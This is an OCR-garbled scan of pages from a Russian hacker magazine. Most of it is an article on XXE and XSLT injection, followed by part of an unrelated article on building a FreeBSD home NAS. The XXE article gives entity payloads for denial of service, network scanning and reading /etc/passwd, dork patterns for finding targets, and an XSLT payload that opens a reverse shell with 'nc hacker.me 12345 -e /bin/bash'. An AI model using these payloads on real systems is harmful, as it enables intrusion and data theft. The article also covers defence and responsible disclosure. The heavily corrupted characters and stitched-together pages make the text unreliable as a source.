что все перечисленные ниже парсеры по умолчанию не произво- 
дят валидацию обрабатываемого документа. В ѴѴіпсІоѵѵз и .ЫЕТ 
используются М5ХМІ_-парсер и пакет Бузіет.хітіі соответствен- 
но. Только начиная с шестой версии, библиотека М5ХМІ_ пере- 
стала разрешать ссылки на внешние сущности по умолчанию. 

В Эаѵа обычно используются пакеты Хегсез и Хаіап (для Х5І_Т). 

И в том и в другом пакете ссылки на внешние сущности по 
умолчанию разрешаются. Наши же любимые интерпретируемые 
языки используют библиотеки ІіЬхтІ2 и ІіЬхзІІ (для Х5І_Т), кото- 
рые тоже по умолчанию разрешают ссылки на внешние сущно- 
сти. Вывод: запрет на разрешение внешних сущностей в пода- 



50АР И РЮ 



Спецификация протокола БОАР подробно регламентирует структуру 
БОАР-сообщения, в частности явно запрещает использование йЮ: 
«Тііе ХМІ іп^озеі о/ а 50АР теззаде МІІ5Т /ѴОГ сопіаіп а Иоситепі 
іуре сіесіагаііоп іп^огтаііоп Нет». Таким образом протокол 
защищен от возможности проведения ХХЕ-атак. С другой стороны, 
конкретные реализации протокола часто не следуютспецификации. 



вляющем большинстве случаев (библиотек) — ответственность 
программиста. 

Для того чтобы понять, насколько много уязвимостей ХХЕ 
присутствует в реальном мире, надо разобраться с тем, где 
и когда в веб-приложениях используются парсеры. Мы выделя- 
ем два класса использования парсеров: на уровне платформы / 
стандартных библиотек и на уровне прикладного (своего) кода. 
Типичный пример использования парсеров на уровне платфор- 
мы — поддержка протоколов ХМЬРРС и БОАР, на уровне при- 
кладного кода — реализация обмена данными между приложе- 
нием и пользователем: импорт, экспорт и так далее. Со вторым 
случаем все ясно — вряд ли найдется много программистов, 
которые при инициализации ХМІ_-парсеров подумают о том, 
чтобы запретить разрешение внешних сущностей. Поэтому 
большинство функций импорта данных в веб-приложение через 
ХМІ_ являются уязвимыми к внедрению внешних сущностей (за 
примером далеко ходить не надо: І_РІ через ХХЕ-уязвимость 
в рЬрМуАбтіп — ■ с ). 

Разберемся теперь с первым случаем — уровнем платфор- 
мы. Посмотрим, что говорят спецификации протоколов ХМІ_- 
РРС и БОАР про внешние сущности. В спецификации БОАР нас 
расстраивают: «а БОАР теззаде МІІ5Т N01 сопіаіп а боситепі 
Іуре сіесіагаііоп іпіогтаііоп ііет». Как показывает опыт, наличие 
правил в стеке еще не означает, что их будут выполнять на прак- 
тике. Тем не менее, шансов найти уязвимость в коде платформы, 
реализующей БОАР, намного меньше, чем в прикладном коде. 

С протоколом ХМЬРРС ситуация значительно лучше (для нас): 
про запрет внешних сущностей или подключение йЮ в специфи- 
кации не сказано ни слова. 

В результате всего изложенного мы сможем вывести классы 
приложений, которые, вероятнее всего, будут уязвимы к разреше- 
нию внешних сущностей (в порядке убывания вероятности): 

1. Сизіот-при ложен ия с функцией импорта данных в ХМІ. 

2 . Приложения, реализующие протокол ХМЬРРС. 

3. Веб-сервисы, реализующие протокол БОАР. 



ЧАСТЬ ТРЕТЬЯ, ПРАКТИЧЕСКАЯ 



Следующий шаг — научиться понимать, разрешает заданное 
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Опасная разметка 




Входной параметр — ІЖІ. модуля, который сделает Х5І_Т-трансформацию 
поХБЬфайлу 

приложение внешнюю сущность или нет. Сделать это крайне 
просто: 

1. Необходимо разместить на своем веб-сервере тестовый 
документ ехібос.іхі с каким-нибудь содержимым, например 
«іпсіисіе те ріеазе!» (на самом деле файл можно даже не раз- 
мещать!). 

2. Датьссылку на него вХМІ_-теле НТТР-запроса. 

3. Проверить ассезз.Іод нашего веб-сервера — а не обратился ли 
кто к нему? (Или ищем ошибку 404, если не размещали.) 

Учитывая, что в протоколах 50АР и ХМІ_ структура ожидаемо- 
го на сервере документа известна, описанный процесс тестиро- 
вания легко автоматизируется (скрипты и описание ты найдешь 
на диске): 

1. Берем список ІІРІ_, реализующихХМІ_-протоколы, и в цикле от- 
правляем по каждому адресуХМІ_-документ (мы егозаготовили 
заранее) формата 50АРилиХМІ_-РРС с внешней сущностью, 
которая ссылается на файл с нашего сервера. При отправке запи- 
сываем ІР-адрес и доменное имя очередного кандидата в файл. 

2. Наш веб-сервер сконфигурирован не отдавать документ оте- 
лом ХМ Б- сущности как статический файл, а перенаправлять 
запросы к нему на специальный обработчик (например, рбр). 
Моб_РеѵѵпІе в помощь. Обработчик фиксирует все входящие 
запросы в журнал, записывая ІР-адрес отправителя. 

3. Ч екаем полученные списки по ІР-адресам и понимаем, какие 
II РІ_ заходили к нам за файлом. 




ХХЕ в Баіагі позволяет вредоносной веб-странице считывать локальные файлы 
с машины клиента 

Здесь следует учесть, что сетевой фильтр на стороне тестируе- 
мого веб-приложения может запрещать исходящие соединения 
в интернет, тогда наш метод «в лоб» не сработает. Внимательный 
читатель спросит: откуда же взять эти начальные списки ІІРІ_ для 
проверки? Конечно, у заказчика тестирования, ответим мы; после 
чего случайно оброним парочку намеков на паттерны гуглопоиска: 

іпигі : хт ігрс .азрх 

іпигі іхтігрс . рИр 

Итак, тестируемое нами приложение разрешает внешние 
сущности. Что дальше? 

1. йоБ — <!ЕІ\ІТІТѴ сІОБ 5Ѵ5ТЕМ и /сІеѵ/ 2 епо ,, > на никсах и <!ЕІ\ІТІТѴ 
сІОБ 5Ѵ5ТЕМ "с:\ра§еб1е.5у5"> на винде (последнее работает 
нестабильно). 

2. Сканируем локальную сеть— < ! ЕМТІТУ зсап 5Ѵ5ТЕМ 
"\\192.168.1.1\С$">. Помни, что сообщения об ошибках и вре- 
менные задержки — наше все! Кстати, про случай из жизни, 
связанный с этим трюком, написано в статье «Риппу Ьаскб» 
Владимира Воронцова в этом номере. 

3. Читаем локальные файлы. Казалось бы, все должно быть про- 
сто: вставляем <!ЕІ\ІТІТѴ рмсі 5Ѵ5ТЕМ и /е1:с/ра55ыс1 "> и мы на 
коне! Но нет. 

Во-первых, тебе кто-то обещал, что сущность, которую ты 
определил в НТТР-запросе, попадет в НТТР-ответ? Правильно, 



ІШП 



ЗАЩИЩАЕМСЯ 



На примере Хегсез-парсера покажем, как можно защититься от 
ХХЕ. Итак, устанавливаем необходимые значения для свойств 
парсера: 

РоситепІіВиіІсІегРасІіогу сІЬ-Р = 

РоситепІіВиіІсІегРасІіогу.пеыІпБІіапсеП ; 

// Отключаем внешние сущности 

сіЬ-Р. зе’СРеаТигеС 

"Іт1:1:р://хт1.оге/5ах/-Реа1:иге5/ех1:егпа1-еепега1-еп1:і1:іе5" . 

X; 

сІЬ-Р. зе1:Реа1:иге( 

"Іі1:1:р://хт1.оге/5ах/-Реа1:иге5/ех1:егпа1-рагате1:ег-еп1:і1:іе5" . 
X; 



// Либо полностью запрещаем РТР 

сІЬ-Р. зе1:Реа1:иге( 

"Ы:1:р://арасЬе.оге/хт1/-Реа1:иге5/сІІ5а11оы-сІос1:ѵре-сІес1" 

•Егие) ; 



Роситепі: В иіісі ег рагзег = 

-РасІіогу.пеыРоситепІіВиіІсІепО ; 

При помощи метода зеЕЕпШуВеБОІѵег можно задать свой 
обработчик внешних сущностей (появляется возможность 
не просто игнорировать сущности, ной обнаруживать XX Е- 
атаки на наше приложение!). Для других ХМ Б- парсеров 
можно найти аналогичные свойства. 



• Протокол ХМЬ-ВРС: 
разработан в 1998 
году( 

ІтІ ). 

автор — ДэйвУинер 
Шаѵе ѴѴіпег). 

• Протокол 50АР: 
разработан 

в 1998 году, 
текущая версия 
спецификации 
БітрІеОЬіесІ Ассезв 
РгоІосоІзресіПсаІіоп 
Ѵегзіоп 1.2 ( 
уѵ3.огд/ТК/зоар12- 
11/). 
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С0ѴЕК5Т0КѴ 



ЧТО ПРОИЗОЙДЕТ, ЕСЛИ ВМЕСТО 
ЛОКАЛЬНОГО ХМЬ-ФАЙЛА 
УКАЗАТЬ ЧТО-ТО УДАЛЕННОЕ? 

никто не обещал. Должно повезти. Стоит сказать пару слов про 
методику тестирования. В сіізіот-приложениях и БОАР-сервисах 
формат обрабатываемого ХМЬдокумента известен (помним 
про ѴѴ50І_). То есть нам необходимо во все теги отправляемого 
документа запихнуть ссылку на нашу сущность и посмотреть, 
вернется ли она в ответе. С ХМЬРРС дела обстоят хуже: в общем 
случае мы не знаем сигнатур методов, реализуемых приложени- 
ем. Т.е. автоматизировать подстановку сущностей в параметры 
вызываемых РРС-методов в общем случае нам не удастся. Тут 
тебе в помощь может прийти спек, описывающий расширение 
ХМІ_-РРС, — ші. 

Используя его, ты, например, можешь получить список мето- 
дов, поддерживаемых на сервере. Увы, далеко не все ХМЬРРС 
приложения реализуют интроспекцию. Во-вторых, почему после 
подстановки сущности итоговый ХМІ_ должен остаться правильно 
построенным? Хорошо, что как минимум в случае с РНР по этому 
поводу беспокоиться не стоит, — делаем Ьазе64-обертку вокруг 
считываемых данных: 

< ! ЕІМТІТУ Ьіп 5У5ТЕМ "рбр : //б!1=ег/геасІ=сопѵег1= . 

Ьазе64-епсосІе/ге5оигсе=/ра1:Іі/1:о/Ьіпагѵ/б1е"> 

Далее мы должны познакомить тебя еще с одним интересным 
методом внедрения ХМІ_. Данный метод может привести к вы- 
полнению кода на сервере. Есть такая технология, называется 
Х5І_Т (см. врезку). Обычно она используется для перевода ХМІ_- 
документов, обрабатываемых веб-приложением, в пригодный 
для отображения в браузере вид. Для трансформации нужны два 
ХМЬдокумента: исходный документ, который мы хотим трансфор- 
мировать, например, в ХНТМІ_, и документ с описанием транс- 
формации. В 99% случаев документ, описывающий трансформа- 
цию, лежит на сервере веб-приложения, а путь к нему прописан 
в каком-нибудь конфиге. В остальном проценте случаев путь 
к нему передается в ІІРІ_ (^асераіт:). Учитывая такой дизай- 
нерский шаг, можно быть уверенным в том, что интересующий 
нас НТТР-параметр не подвергается никакой обработке, то есть 
мы сможем указать Х5І_-документ, лежащий на нашем серве- 
ре. А дальше, если Х5І_Т-трансформатор был инициализирован 
в РНР-коде кривого веб-приложения следующим образом: 

$ргос = Х$ИРгосе550г( ) ; 

$ргос->ге§І5І:епРНРРипс1:іоп5 0 ; 

то мы сможем внутри Х5І_-документа использовать РНР-функции, 
например, воттак: 

<хб 1 : Біуіезііееі: ѵег5Іоп="1.Ѳ? 

хт1п5 :х5І="Іі1:1:р: //ыыы.ы3.ог§/1999/Х51/Тгап5-Рогт" 

хтіпз: рИр=" Міііір : //рМр . пе1:/х5І"> 

<хз1:1=етр1а 1=е та~Ь сІі="/"> 

<хб 1 : ѵаіие-о-р 5е1ес1:= 

"р!ір:-Рипс1:іоп( ' Бузует' . 

1 пс баскег.те 12345 -е /Ьіп/Ьазіп -ѵ')"/> 

</хб 1 :1:етр1а1:е> 

</хз1:з1:у1е5Ііее1:> 

Хорошо, что подобных приложений в природе мало (доодіе кунг-фу 
поможеттебе их найти) и с каждым днем становится все меньше :). 



ЧАСТЬ ЧЕТВЕРТАЯ, ДЕМОНСТРАЦИОННАЯ 



Мы подумали: интересно, а за сколько мы сможем найти в ин- 
тернете приложение, уязвимое не просто к классической ХХЕ- 
атаке, а чтобы там еще и Х5І_Т-трансформация была? Сказано 
— сделано. 

Перво-наперво мы пошли на сервисы поиска программно- 
го кода ( ігд., кс ), а также в Соодіе 

(пользуясь случаем, хочу выразить глубокое сожаление по 
поводу так не вовремя закрытого сервиса боодіе Собе БеагсЬ). 
Нас интересовал заведомо уязвимый участок кода, связан- 
ный с загрузкой ХМІ_- или Х5І_-документа для последующей 
Х5І_Т-трансформации, имя которого берется прямо из пара- 
метра СЕТ-запроса. Таким образом мы искали строки вида 
«$хз1бос->1оаб($_СЕТ» и «$хт1бос->1оаб($_СЕТ». В результате 
нашлись проекты с уязвимым кодом, но масштаб проектов нам 
не понравился, и мы решили не связываться с ними. Следую- 
щей идеей был поиск веб-приложений, в которых есть модули 
Х5І_Т-трансформации, принимающие в качестве аргумента имя 
ХМІ_-документа: іпиг1:"1:гап5Тогт.рбр?хт1=" (и потрясающее 
іпип1: , Чпап5-Ропт.ру?хт1=" — от структуры 1)РІ_ на сайтах из 
выдачи слезы наворачивались на глаза). В итоге для дальней- 
шего анализа мы взяли одно из приложений, в СІРІ_ которого 
было значение /ра1:ІіДпап5-Ропт.рІір?хт1=<имя документах Нам 
повезло, что обо всех ошибках, возникших при трансформа- 
ции, приложение радостно сообщало в НТТР-ответе. Первым 
делом нам интересно было узнать, что произойдет, если вместо 
имени локального ХМІ_-файла указать что-то удаленное: /раі:Іп/ 
Ііпапз-Ропт. рІпр?хт1=И1:1:р ://уа .пи/. Как мы и предполагали, оно 
деловито полезло за ХМЬдокументом на Яндекс, но поперхну- 
лось (см. иллюстрацию). 

Дальше план был таков: 

1. Скачать на управляемый нами веб-сервер исходный ХМІ_- 
документ, который успешно проходит трансформацию. Доку- 
мент, очевидно, был доступен как /ра-Ці/<имя документах 

2. Добавить в документ іпІіпе-ОТО, в которой определить парочку 
сущностей — простую и внешнюю: 

< ! ЕІМТІТУ рі "3 . 141592 "> 

<!ЕІМТІТУ ІтЕассезз 5У5ТЕМ "біе: ///ра1=Іі/1=о/ . Іі1:ассе55"> 

а в самом ХМІ_-документе сослаться на простую сущность рі 
(для начала). 

3. За просить трансформацию заряженного ХМ І_ с нашего сервера: 
/р а* Ь/Х. па п 5-Ро пт . р Ь р ? хт 1= М: 1: р : //у о и 1 1 п е ѵе п§ и е 5 Б* б е п а . т е/ 
іпс.хті и поискать в ответе число пи (почему его там могло не 
оказаться — читай ниже). Нам повезло — сущности, разрешав- 



Х5І_ И Х5И 



ЕхІепзіЫе Б*уІе5Ьее* І_апдиаде (Х5І_) — это группа языков, 
предназначенных для преобразования ХМІ_-документов или их 
визуального представления. Эта группа состоит из трех частей: 

• ХБІ-Тгапз^огтаііопз (Х5І_Т) — язык преобразований ХМ І_- 
документов; 

• Х5І_Рогтаиіпд0Ь)есЫХ51.-Р0) — язык, специфицирующий 
визуальное представление ХМ1_-документа; 

• ХМІ_Ра*Ь І_апдиаде(ХРа*Ы — язык, предназначенный для до- 
ступа копределеннымчастямХМІ_-документа (используется как 
в контексте Х5І_Т, так и самостоятельно). 

Специфицируется консорциумом ѴѴЗС (ЕхІепзіЫе Біуіегбееі 
І_апдиаде (Х51_) Ѵегзіоп 1.1). 
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Опасная разметка 



<*тІ ѴМІ0П-Ч.О* *вд*«д*^ 

игг яді:50др.Еі№Іігошіятіциііиад адгид^егі^йздмГ 
хі^:іадтвд5-"чгр:кгіз^^ ьмрігі^к^гѴім^ 
кга^;иш=^1ф.^^у^^3 ,ш$Ша ^>т.Еатшті-кти!апнГ 
ші*ш:ЗОАР-ЕКО*мів^кЬег л а тЪыплг$№Ь$ьгѵо4'\поГ 
міііга:«ш>®ра4-ТкШ^ 

* тЛт* ; ямі =" 1 д : д г а-' 2 М. ? ,'Х^-! І_ Зс^тш" 

5Ю^й^^-Е^^^№Iзойіпэ®У^^■ к 1I;с';^ , Б^41е^!а^ г лп^I^^^ д*--<ЮАР 

е мѵвойу> 

^&*Р-Ш&тт4щД№0* 

хи ІѴреа'хій і1рігщ'>ЙО АР гЕНѴ:51 1 «ЛаиКой*» с^миіііппд 

х&1уре=^-мнгід>иі«то*п і^ца^е^у&крічи ьл !й*!*і 

яы:1урв="тщ] Е^гіпд-^и^Ипсюті йпдиаре гмй: ігОіОігеей :^ 0 ет 1 :яыпЛэиаН 

^ае-гп-йігл : 1 : 1 :гімгпоп:Л«гііЫп :/Ыіъ'еК 

ЫткІ^ЫпіПНпііЪІпШІі 

іѴі;я.;3;3;іѴл^ѵ^Ып/іН 

•уікх4:Ш$4:іуік:№п:ІІЫ ги**упе 

омтгх: 3: М:^т**;іілгМіп«;гаііГ*Ь 

т^^іВИ2^*гіѴУ*г^мсг>*^тіп^ЬіПі , *І> 



ХХЕ в Яндексе обнаружилась при обработке 50АР (к слову о зресгіісаііоп ѵз ітріетепіаііоп) 

мые парсером в исходном документе, проходили трансформа- 
цию в конечный документ. Нам оставался последний шаг. 

4. Модифицируем ХМЬдокумент на нашем сервере второй раз, 
добавляя ссылку на внешнюю сущность (&Ыассезз;) в тело 
документа, и повторяем запрос на трансформацию. Конечно, 
читать остальные файлы (в том числе /еіс/раззѵѵсі и/сіеѵ/гего) 
мы не стали, зато уведомили администратора сайта об уязви- 
мости. 

Теперь пару слов о том, почему нам повезло. Вообще-то Х5І_Т- 
трансформатор не обязан выводить в итоговый документ сущно- 
сти, разрешенные в исходном. Чтобы заставить его это сделать, 
в ІіЬхтІ2 (а следовательно, и в РНР) нужен дополнительный 
вызов. В итоге код, реализующий трансформацию, должен быть 
примерно таким (ключевая строка — зиЬзШиІеЕпіШез): 

< ? рЬр 

// Исходный документ 

$хш1 = РОМРоситегтЕ; 

$хш1->1оасІ( 1 соііесіііоп.хті ' 1 ; 



// Документ, описывающий правила трансформации 
$хб 1 = пеш РОМРоситепІ:: 



// Осуществить подстановку сущностей в документ. 

// идущий в трансформатор 

// Соответствующая настройка в 1іЬхш12 

// описана тут: хт1зо1Ч:.ог%/хіті1геасІег.Іі1:іті1#Еп1:і1:іе5 

// Отметим, что это самодеятельность 1іЬхт12. 

// в спецификации РОМ про это нет ни слова 

$сІош->5иЬ5І:і1:и1:еЕп1:і1:іе5 = Іігие; 

$х5І->1оасІ( ' соііесіііоп.хзі ' 1 ; 



// Инициализация Х$И-трансформатора (враппер над ІіЬхзІІ:) 

$ргос = Х$ИРгосе550г ; 

// Связывание трансформатора с правилами трансформации 

$ргос->ітрог1:$1:ѵ1е$Ііее1:($х5І) ; 

// Применение трансформации к документу соііесіііоп.хті 

есііо $ргос->1:гап5-РогтТоХМІ($хт1) ; 

?> 



ЗАКЛЮЧЕНИЕ 



Вообще отношение к сущностям во время трансформации сильно 
зависит (внезапно!) от конкретного парсера. Так что на практике 
тебе придется проверять поведение в каждом конкретном случае. 
Сохранение сущностей после трансформации в современных ХМІ_- 
парсерах — отличная тема для хорошего и очень востребованного 
обзора. Апуопе? У нас все. НЕ 



ИСТОРИЯ РАЗВИТИЯ ХМІ_ 
ІШЕСТІОЫ 



1999 

В спецификации ГСРС 2518 для ѴѴеЬРАѴ-приложений рассма- 
триваются возможные опасности, связанные с разрешением 
внешних сущностей в ХМЬ. 



2002 

Грегори Стюк (Сгедогу 51еиск) в рассылке зесигііуіосиз.сот 
впервые описывает атаку ХХЕ. Амит Кляйн (Атіі КІеіп) пишет 
об уязвимости Ехіегпаі ЕпШу Ехрапзіоп в продуктах ведущих 
вендоров (возможность Ро5-атаки на основе ХХЕ, так называе- 
мой «ЬіІІіоп ІаидЬз аііаск»). 



2004 

Распространение уязвимостей ХРа1Ь/Х5І_Т іщесііоп. 



2005 

ХХЕ-уязвимость в АсІоЬе Реасіег 7. Х5І_Т іщесііоп в Рігеіох. 



2007 

ХМІ_ іщесііоп в 5ип ^ѵа 5уз1ет Арріісаііоп 5егѵег апсі ѴѴеЬ 
5егѵег, связанная с внедрением команд в процессе Х5І_Т- 
обработки. 



2008 

ХХЕ в 5ип Заѵа ^^К апсі Л*Е 6 Іірсіаіе 3. 



2009 

ХХЕ в Арріе 5а1агі, іРЬопе 05 1.0. 



2010 

Серия уязвимостей ХМІ_ іщесііоп сразу в нескольких продуктах 
АсІоЬе. 



2011 

Уязвимости, связанные с ХХЕ, в Місгозоіі ХМІ_ Есіііог (и прило- 
жениях МісгозоН, его использующих). 



ІУАУАУІ 

• Спецификация 
ХМИ.ОЬ: 

доо.дІ/пІЖХг . 

• СписокХМЬ 
протоколов отѴѴЗС 

іѵг. 

• Блог Владимира 
Воронцова, 
описание ХХЕ 

в Яндексе: 

Аі . 



ѴМВИШб 



ГГП 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни авторы не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



На нашем дискеты 
найдешь исходники, 
описанные в статье, 
а также примеры 
уязвимых кХМІ-іп- 
Іесііоп приложений. 
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Евгений Зобнин (іоЬпіпйдтаіІ.сот) 





СОБИРАЕМ 
ДОМАШНИЙ 
ЫА5 ИЗ (ОЧЕНЬ) 
СТАРОГО 
ЖЕЛЕЗА 

Настольные компы постепенно 
выходят из моды, уступая 
место различным мобильным 
девайсам, таким как смартфоны, 
планшеты и ноутбуки. Внутренние 
накопители подобных устройств 
обычно невелики, поэтому 
рано или поздно встает вопрос 
об организации домашнего 
файлового хранилища, которое 
бы выступало в роли сетевой 
файлопомойки и торрент-клиента, 
доступных всем устройствам. 

К счастью, такое хранилище легко 
собрать из подручных материалов. 
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Из грязи в І\ІА5'ы 



ВВЕДЕНИЕ 

В этой статье я расскажу о том, как собрал собственный домашний 
ІЧА5, потратив на это в общей сложности около 700 российских 
рублей. І\ІА5 получился стойким к сбоям (привет РАЮ 1), перебоям 
в питании (благодаря старенькому ІІРБ'у), с экспортом файло- 
вой системы по І\ІР5 и 5ЕТР, а также торрент-демоном, который 
включается по ночам и отрубается днем. Решение задачи заняло 
в сумме около часа, не считая ожидания китайских железок 
с беаіехігете.сот. 

ЧАСТЫ. КОМПОНЕНТЫ 

Основной компонент, используемый для решения задачи, был 
найден в шкафу. Это древний системный блок на базе Репііит II 
(первый и последний процессор, втыкаемый в слот!) с 64 Мб опе- 
ративной памяти и дохлым жестким диском на 10 Гб. Громоздкий 
корпус мне был не нужен, поэтому материнская плата с процессо- 
ром, металлической платой, при помощи которой она крепилась 
к корпусу, оперативной памятью и видеокартой была вынута 
вместе с блоком питания. Также от корпуса был отсоединен крепеж 
для жестких дисков, после чего пластмассовая коробка, гордо 
именуемая «Корпус АТ», отправилась в утиль. 

Далее началась работа по сборке всех необходимых компонен- 
тов без самого корпуса. Путем недолгих раздумий было решено 
прикрутить все необходимое к тому самому металлическому карка- 
су для крепления материнской платы. Сама материнка оказалась 
формата тіпі-АТ, поэтому места на плате оставалось достаточно 
для монтирования блока питания и крепежа для жестких дисков. 
Оставалось только просверлить дополнительные отверстия. 

Дабы избежать лишнего шума, корпус блока питания (а также 
процессора) был снят и утилизирован вместе с уже мертвыми 
вентиляторами. Далее блок питания и крепеж для жестких дисков 
были прикручены к металлическому каркасу прямо рядом с мате- 
ринской платой. Сразу был установлен БАТА-диск на 500 Гб, уже 
год пылившийся в том же шкафу. 

Далее началось решение проблемы ЮЕ ѵз БАТА, которое затя- 
нулось на три недели. Дело в том, что необходимо было, во-первых, 
БАТА-диск подключить к ЮЕ-материнке, а во-вторых, как-то 
решить проблему загрузки ОС, которая должна была быть уста- 
новлена именно на ЮЕ-диск. Я принял решение установить ОС на 
двухгигабайтную карту памяти Сотрасі ГІазЬ, а для ее подключе- 
ния использовать специальный переходник СГ Іо ЮЕ, заказанный 
на беаіехігете.сот за пять долларов. Там же сразу был заказан 
БАТА-контроллер на чипе ѴІА ѴТ6421А производства знаменитого 



китайского бренда ІМопате, стоимостью десять долларов, а также 
пара кабелей питания ЮЕ — БАТА по доллару за каждый. 

Через три недели все это хозяйство вместе с игрушечной 
машинкой, работающей от солнечной энергии, зачем-то заказан- 
ной мной за два доллара, было получено на почте и подключено 
к остальному хозяйству. В результате была собрана система, пока- 
занная на фотографии. Из механических элементов на ней остался 
только жесткий диск, издающий не так уж и много шума. Допол- 
нительно к материнке был подключен сверхбюджетный ЕіЬегпеІ- 
адаптер РеаІІек, доставшийся мне от провайдера и долгое время 
лежавший в шкафу. Видеокарту тоже пришлось оставить на месте, 
так как производители старых бюджетных материнок не пред- 
ставляли себе компьютера без монитора и встраивали в материнку 
механизм «защиты», запрещающий загрузку ОС без видеокарты. 

ЧАСТЬ 2. УСТАНОВКА ОС 

Далее следовало выбрать ОС, подходящую для установки на 
«Франкенштейна». Я не фанатик, поэтому сделал сухой логический 
вывод о том, что держать на устройстве РгееВБй будет удобнее 
с точки зрения как управления, так и полученной в результате 
функциональности. ЕгееВБй подходила для решения задачи прак- 
тически идеально, не требуя доустановки дополнительного ПО. 

ОС была получена с официального сайта ігеебзсі.ога — я вы- 
брал девятую версию, хотя сомневающиеся могут остановиться 
на версии 8.3, как более протестированной и объезженной. Далее 
образ был нарезан на болванку, к компу был подключен айдишный 
Сй-привод, который я чуть не выбросил вместе с корпусом, а также 
клавиатура и монитор. После недолгих копаний в настройках ВЮ5 
машина начала грузиться с диска, выдав на экран приглашение 
нового инсталлятора РгееВБО 9. В качестве диска для установки я 
выбрал СГ-карту, а если точнее — первый ЮЕ-диск, и разбил его 
следующим образом: 

• 128 Мб - 5шар 

• 256 Мб - / 

• 256 Мб - /ѵаг 

• остальное - /изг 

Место для домашних каталогов пользователей я отводить 
не стал, поскольку все файло так или иначе будет храниться на 
другом диске, подключенном к БАТА-контроллеру. После оконча- 
ния весьма непродолжительной для такого динозавра установки 
машина была перезагружена и встретила меня приглашением 
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к входу в систему. Войдя под учетной записью гооі, я сразу создал 
дополнительного бесправного пользователя ііпгі и поместил его 
в группу ѵѵЬееІ: 

# асИизег ііш 

Он мне понадобится для входа по 55Н, открывать который для 
гооі'а я не собирался. Далее следовало проверить сеть с помощью 
ікопПд и пинга. В моем случае все заработало само собой, так как 
сервер был подключен к ѴѴі-Рі-роутеру, который назначил серверу 
ІР-адрес 192.168.0.100 и отдал свой адрес в качестве 0145-сервера. 
Пинг показал, что внешний мир был доступен, включая интернет 
и другие подсоединенные к роутеру устройства. Если в твоем 
случае сеть придется настраивать вручную, то это просто сделать 
с помощью редактирования /ек/гс.сопЕ 

і-Рсопб^ г10="іпе1= 192.168.0.100 пеІітаБк 255.255.255.0" 

с!е-Раи11=гои1:ег= 



Также необходимо добавить запись о 0145-сервере (здесь 8. 8. 8. 8 
не пример, а реальный 0145-сервер Гугла): 

# есбо 'пашезегуег 8. 8. 8. 8' >> /е1:с/пе50Іѵ. соп-Р 

С помощью сітезд также было выяснено, что 5АТА-диск успеш- 
но подхватился и получил имя асІ4 (асІО — асІЗ зарезервированы за 
встроенным ЮЕ-контроллером). Значит, самое время отключить 
клавиатуру и мышь, поставить сервер на его законное место, 
войти по 55Н и приступить к созданию файловой системы и всех 
остальных дел. 

ЧАСТЬ 3. РАЮ 

На момент написания статьи мой сервер был оснащен одним дис- 
ком и только готовился к приему двух емких носителей и созданию 
РАЮ-массива на их основе. Поэтому рассказ о РАЮ будет носить 
чисто теоретический характер, что не страшно, потому что РАЮ во 
РгееВ50 — это просто, и такая процедура проделывалась множе- 
ство раз на других машинах без сучка и задоринки. 

Итак, представим, что к нашему 5АТА-контроллеру подключено 
уже два диска и мы хотим объединить их в РАЮ-массив. Для этого 
можно использовать либо железный РАЮ-контроллер (для управ- 
ления которым придется устанавливать дополнительные утилиты, 
разбираться со спецификой производителя и надеяться, что он не 
глючит), либо простой, удобный и проверенный временем механизм 
управления РАЮ'ами во РгееВ50. Остановимся на втором варианте. 

Начиная с пятой ветки, все операции с дисками во фряхе произ- 
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водятся с помощью подсистемы ОЕОМ, которая пропускает через 
себя все запросы ввода-вывода и модифицирует их различным об- 
разом с помощью подключаемых классов модулей. Таких модулей 
существует несколько десятков, и служат они разным целям — от 
проброса дискового ввода-вывода по сети и шифрования до соз- 
дания РАЮ-массивов самых разных уровней. Нас интересуют два 
модуля: дтіггог, предназначенный для зеркалирования дисков, то 
есть создания РАЮ 1, и дзігіре, который пишет данные поперемен- 
но на два диска, реализуя РАЮ 0. 

Разные ситуации могут потребовать разных типов РАЮ- 
массивов. Для хранения РЮ-фильмов лучше использовать РАЮ 0, 
чтобы получить больше пространства, а для хранения семейных 
видеоархивов, документов и редкой музыки в формате ПАС 
лучше использовать РАЮ 1, который позволит сохранить данные 
даже в случае смерти одного из дисков. Поэтому рассмотрим оба 
варианта. 

Итак, зеркалирование. Чтобы создать массив РАЮ 1 из двух 
дисков, достаточно загрузить модуль дтіггог и выполнить одну 
простую команду: 

# дтіггог ІоасІ 

# дтіггог ІаЬеІ -ѵ -Ь зрііі: -5 2048 сіаііа асІ4 асіб 

Здесь «ІаЬеІ» — это указ команде дтіггог инициализировать мас- 
сив, опции «-Ь зрііі -з 2048» задают алгоритм балансировки «зрііі», 
который будет читать данные с обоих дисков одновременно пан- 
ками размером 2048 байт. Это оптимальный, наиболее производи- 
тельный вариант, однако по желанию ты можешь выбрать один из 
трех других алгоритмов: «ІоасІ» — чтение с наименее загруженного 
диска, «ргеіюг» — чтение с диска, имеющего больший приоритет 
(причем чем позже диск был добавлен в массив, тем выше его 
приоритет — логика здесь в том, чтобы создавать больше нагрузки 
на новые диски, подключенные позже взамен умерших), и «гоипсі- 
гоЬіп» — то есть по кругу, один запрос одному диску, другой — 
другому. Последние три опции — это имя массива (оно может быть 
произвольным) и список дисков, объединяемых в массив. 

Если на одном из подключаемых дисков уже есть данные и ты 
не хочешь их терять, то вместо предыдущей команды лучше ис- 
пользовать следующие две: 

# дтіггог ІаЬеІ -ѵ -Ь 5р1і1: -5 2048 сіаііа асІ4 

# дтіггог іпзегЕ сіаііа асіб 

Первая команда создаст массив из одного диска, а вторая под- 
ключит к нему второй диск, после чего начнется процесс синхро- 
низации, за ходом которого можно следить с помощью команды 
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Из грязи в ЫА5'ы 




/■ каталог длі- загрузки -ыйлаВ ■ . . 

'гімпЗмнІ-гіІг" : я \/шрІ\/ШгтІъ\/ ш . 

/• Лигчиги нл скорость емчийлнин и атдпчи. аткшмсни */ 
"скипІшій-Е іпі 1 " : 1303, 

"ОдуііІовв-Іів.ІІ-еі^ЫкГі 0, 

'‘иртІалЕІ ИііГ: ІВ0Я, 

ч ирІімгі-ІкііІІ-СпііЫьГ! е. 

/■ Сохранять (ыйгси с гасхоО 22 118 В 10-ой сисгсмеі , ш/ 
/в что гияйолит ^лйтсі им другьш польаДгтемн ■/ 
*ШвІГі 10. 

Настройка интерфейса цдагенногд доступа 
• : : іиі1І».-пЕ іСлІ іуіг гециіг =и‘ : 1, 

“гре-ра*мнг? “пярппь^ 

Ѵрс-рогі 4 ! днэі, 

